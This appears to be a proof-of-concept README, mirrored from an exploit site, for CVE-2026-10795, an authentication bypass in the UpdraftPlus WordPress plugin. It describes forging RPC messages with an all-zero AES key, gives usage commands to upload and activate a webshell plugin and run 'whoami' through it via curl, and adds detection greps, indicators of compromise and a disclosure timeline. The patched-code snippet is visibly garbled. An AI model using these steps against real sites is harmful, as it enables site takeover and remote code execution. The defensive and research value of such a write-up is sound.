Share 
## https://sploitus.com/exploit?id=F17976B9-4448-5BEE-AEAE-209CDB4A1A3C
# CVE-2026-10795
CVE-2026-10795 โ€“ UpdraftPlus Authentication Bypass
# CVE-2026-10795 โ€“ UpdraftPlus Authentication Bypass PoC

> โš ๏ธ **Disclaimer:** This repository is for **educational purposes only**.  
> Only use this on systems you own or have explicit permission to test.  
> The author is not responsible for any misuse.

---

## ๐Ÿ“‹ Overview

| Field | Details |
|---|---|
| **Plugin** | UpdraftPlus: WP Backup & Migration |
| **Affected Versions** | โ‰ค 1.26.4 |
| **Patched Version** | 1.26.5 |
| **CVSS Score** | 8.1 (High) |
| **Vulnerability Type** | Unauthenticated Authentication Bypass โ†’ RCE |
| **Discovered by** | vtim (Wordfence Bug Bounty) |
| **Bounty** | $5,200 |

---

## ๐Ÿ” Vulnerability Summary

UpdraftPlus registers an **unauthenticated RPC listener** on every page load for sites connected to UpdraftCentral.

The `decrypt_message()` function fails to validate the return value of `$rsa->decrypt()`.  
When RSA decryption fails, `false` is passed to `Rijndael::setKey()`, which collapses to a **deterministic all-zero AES-128 key**.

An attacker can:
1. Forge a `udrpc_message` encrypted with the zero key
2. Have the server decrypt it successfully
3. Execute arbitrary RPC commands as the connected administrator
4. Upload & activate a malicious plugin โ†’ **Remote Code Execution**

---

## ๐Ÿงฌ Vulnerable Code

```php
// updraftplus/includes/class-remote-communications-v2.php
// Lines 460-491 (version 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// โŒ No return value check!

$rij->setKey($sym_key);  // false โ†’ all-zero key
return $rij->decrypt($ciphertext);
```

## โœ… Patched Code

```php
$sym_key = $rsa->decrypt($sym_key);

// โœ… Added in 1.26.5
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) setKey($sym_key);
return $rij->decrypt($ciphertext);
```

---

## ๐Ÿ“ Repository Structure

```
updraftplus-auth-bypass/
โ”œโ”€โ”€ README.md
โ”œโ”€โ”€ poc.py                  # Main exploit script
โ”œโ”€โ”€ requirements.txt        # Python dependencies
โ”œโ”€โ”€ payloads/
โ”‚   โ”œโ”€โ”€ list_plugins.py     # List installed plugins
โ”‚   โ”œโ”€โ”€ upload_shell.py     # Upload webshell plugin
โ”‚   โ””โ”€โ”€ activate_plugin.py  # Activate uploaded plugin
โ”œโ”€โ”€ shell/
โ”‚   โ”œโ”€โ”€ build_shell.py      # Builds webshell ZIP
โ”‚   โ””โ”€โ”€ test-shell.php      # Minimal PHP webshell
โ””โ”€โ”€ docs/
    โ”œโ”€โ”€ technical-analysis.md
    โ””โ”€โ”€ patch-diff.md
```

---

## โš™๏ธ Installation

```bash
git clone https://github.com/yourname/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt
```

**requirements.txt**
```
requests==2.31.0
pycryptodome==3.20.0
```

---

## ๐Ÿงช Test Environment Setup

### 1. Install XAMPP
```
https://www.apachefriends.org
Start: Apache + MySQL
```

### 2. Install WordPress + UpdraftPlus 1.26.4
```bash
# Place WordPress in htdocs
C:/xampp/htdocs/wordpress/

# Install vulnerable plugin version
# Download: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4
```

### 3. Connect to UpdraftCentral
```
WordPress Admin โ†’ Settings โ†’ UpdraftPlus โ†’ UpdraftCentral tab โ†’ Connect
```

> โš ๏ธ **Required:** Site must be connected to UpdraftCentral for the vulnerability to be exploitable.

---

## ๐Ÿš€ Usage

### Basic Usage
```bash
python poc.py --url http://localhost/wordpress/ --user-id 1
```

### List Plugins
```bash
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins
```

### Upload Webshell
```bash
# Step 1: Build the shell ZIP
python shell/build_shell.py

# Step 2: Upload
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# Step 3: Activate
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# Step 4: Test RCE
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"
```

---

## ๐Ÿ”ฌ How It Works

```
poc.py
  โ”‚
  โ”œโ”€ 1. Craft malformed RSA-encrypted sym_key (garbage bytes)
  โ”‚
  โ”œโ”€ 2. Encrypt RPC payload with ZERO AES-128 key (0x00 * 16)
  โ”‚
  โ”œโ”€ 3. Build udrpc_message:
  โ”‚       [3-byte hex len][fake_sym_key][16-byte hex cipherlen][ciphertext]
  โ”‚
  โ”œโ”€ 4. POST to target (no auth, no nonce, no cookies needed)
  โ”‚
  โ””โ”€ 5. Server-side:
          rsa->decrypt(garbage) โ†’ false
          setKey(false)         โ†’ 0x00 key
          decrypt(ciphertext)   โ†’ our payload โœ…
          wp_set_current_user() โ†’ admin access
          RPC command executes  โ†’ RCE ๐Ÿ’€
```

---

## ๐Ÿ›ก๏ธ Detection & Mitigation

### Mitigation
```
Update UpdraftPlus to version 1.26.5 immediately.
```

### Detection (Log Analysis)
```bash
# Look for suspicious POST requests with udrpc_message
grep "udrpc_message" /var/log/apache2/access.log

# Wordfence users are protected since June 3, 2026
```

### Indicators of Compromise
```
- Unexpected plugin installations
- New PHP files in wp-content/plugins/
- POST requests to WordPress root with udrpc_message parameter
- Unexpected admin-level actions in WordPress logs
```

---

## ๐Ÿ“… Disclosure Timeline

| Date | Event |
|---|---|
| June 1, 2026 | Vulnerability submitted via Wordfence Bug Bounty |
| June 3, 2026 | Validated & disclosed to vendor |
| June 3, 2026 | Wordfence Premium firewall rule deployed |
| June 4, 2026 | Vendor acknowledged |
| June 5, 2026 | Patch released (v1.26.5) |
| July 3, 2026 | Wordfence Free protection active |

---

## ๐Ÿ“š References

- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/)
- [UpdraftPlus Plugin Page](https://wordpress.org/plugins/updraftplus/)
- [phpseclib RSA Documentation](https://phpseclib.com/docs/rsa)
- [Plugin Changelog](https://plugins.trac.wordpress.org/browser/updraftplus/)

---

## ๐Ÿ‘ค Credits

- **Original Discovery:** vtim (Wordfence Bug Bounty Program)
- **PoC Author:** izxci
- **Purpose:** Educational / Security Research

---

## ๐Ÿ“œ License

```
MIT License โ€“ For educational use only.
Unauthorized use against systems you don't own is illegal.
```